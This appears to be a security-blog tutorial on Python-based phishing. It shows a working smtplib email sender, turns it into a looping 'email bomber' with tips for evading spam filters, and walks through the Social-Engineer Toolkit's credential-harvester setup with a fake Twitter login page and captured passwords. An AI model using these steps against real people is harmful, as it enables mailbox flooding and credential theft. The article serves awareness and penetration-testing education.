Can Python-based tools be used for phishing?
Python is a scripting language with great community support. Because of this heavy community support, several offensive tools have been developed in Python. For the same reason, it will also be easier to develop python based offensive tools even for beginners. Phishing is no different. There are several python based tools developed for phishing attacks. It is possible to send sophisticated phishing emails using Python. Social Engineering Toolkit(SET) by Sensepost is a great example of Python based phishing tools. The Social Engineering Toolkit comes preinstalled with Kali Linux and we will discuss some features of Social Engineering Toolkit in a later section of this article.
What is a Python email sender?
A python script that can send emails is generally termed as python email sender. Python comes with great support for sending emails. Without requiring additional installations, we can use the built-in module available in its standard library for sending emails via SMTP. The following line can be used to import the smtplib module which gives us the ability to send emails. In all our examples in this article, we will use gmail as an example. By default Google doesn’t allow us to connect to a gmail account to send emails and thus the following step is required before proceeding further. Access the following URL using the google account we want to send emails from. Enable the button as shown in the following figure. Now, the following python script can be used to send an email from this email id. body = ‘This email is sent using python’ message = f’Subject: {subject}\n\n{body}’ server = smtplib.SMTP_SSL(‘smtp.gmail.com’, 465) server.login(“username“, “password“) server.sendmail( “from email address“, “to email address“, message) server.quit() Just make sure that highlighted fields are appropriately replaced with actual values. Running this script will send an email to the email address specified in To field. In the following figure, we can verify that the email has been successfully delivered.
What is a Python email bomber?
According to Wikipedia, “an email bomb is a form of net abuse consisting of sending large volumes of email to an address in an attempt to overflow the mailbox, overwhelm the server where the email address is hosted in a denial-of-service attack (DoS attack) or as a smoke screen to distract the attention from important email messages indicating a security breach”. A python program that is capable of sending large volumes of emails to flood the victim is termed as email bomber. Writing a simple email bomber in python is as simple as keeping the program shown earlier in a loop. While, this is simple to develop; it is also simple to get caught by spam filters due to its simplicity. Because of this, we will need to employ various other techniques such as using time delay, sending from a trusted source etc to avoid detection. The following script shows an example of a simple email bomb that sends 10 emails to the specified email address. The number in the while loop can be increased to send more emails, but this proves the point. body = ‘This email is sent using python’ message = f’Subject: {subject}\n\n{body}’ server = smtplib.SMTP_SSL(‘smtp.gmail.com’, 465) server.login(“username”, “password”) i = 1 while i < 11: server.sendmail( “from email address”, “to email address”, message) i += 1 server.quit() Once the script is run, we can verify if the emails are delivered. As we can notice, the emails have been delivered successfully. In this case, the from and to emails are the same. But it works the same way even when they are different.
Python, phishing and social engineering (SET): understanding the risks
As mentioned earlier, the Social Engineering Toolkit is a useful toolset that can be used for phishing and social engineering attacks. This tool kit is completely written in python and comes with a great set of features. Sending mass emails, phishing websites and payload creation are some of the features that are worth noting. Let us understand how SET can be used to conduct a simple phishing attack. First, we can clone and install social engineering toolkit using the commands shown below. pip3 install -r requirements.txt python setup.py Once the installation is successful, we can launch the toolkit using the command shown below. This will show the following menu. 2) Penetration Testing (Fast-Track) 3) Third Party Modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set> 1 Choosing 1 in the preceding menu will show the menu for Social-Engineering attacks, which looks as follows. 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) Third Party Modules 99) Return back to the main menu. set> 2 We are interested in setting up a phishing attack using a fake web form. So, choosing 2 in the preceding menu shows the options relevant to it. 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Web Jacking Attack Method 6) Multi-Attack Web Method 7) HTA Attack Method 99) Return to Main Menu set:webattack> 3 Within Website Attack vectors, there are several attacks possible. In this example, we will use the Credential Harvester Attack Method to grab credentials from victims using a fake login page. So, choose 3. 3) Custom Import 99) Return to Webattack Menu set:webattack> 1 We can choose existing Web Templates or clone a site. Let us choose option 1 to use a template that is available within SET. This will also pick the IP address for the POST back as shown below. If this IP address is incorrectly picked, we can manually set one. The next step would be to choose a Website template from the list below. 3. Twitter set:webattack> Select a template: 3 In this case, we are choosing Twitter. Once done, everything will be set and we should be ready to send our link to the fake login page to the victims by various means such as sending emails. The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [] The Social-Engineer Toolkit Credential Harvester Attack [] Credential Harvester is running on port 80 [] Information will be displayed to you as it arrives below: When the victim visits the IP address (or the domain name), the following page appears. If credentials are entered, they will be posted back in the SET console as highlighted below. POSSIBLE USERNAME FIELD FOUND: session[username_or_email]=testuser POSSIBLE PASSWORD FIELD FOUND: session[password]=hackmeifyoucan PARAM: authenticity_token=dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52 PARAM: scribe_log= POSSIBLE USERNAME FIELD FOUND: redirect_after_login= PARAM: authenticity_token=dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52 [] WHEN YOU’RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. Social engineering toolkit is a powerful toolset for anyone to perform social engineering attacks. The powerful features it brings along with the malicious payloads is surely a danger if it is used maliciously. User education through internal phishing campaigns is one of the effective ways to prevent such attacks.
Sources
Trustedsec- Social engineer toolkit Github – Social engineer toolkit Infosec IQ – Phishing attack types
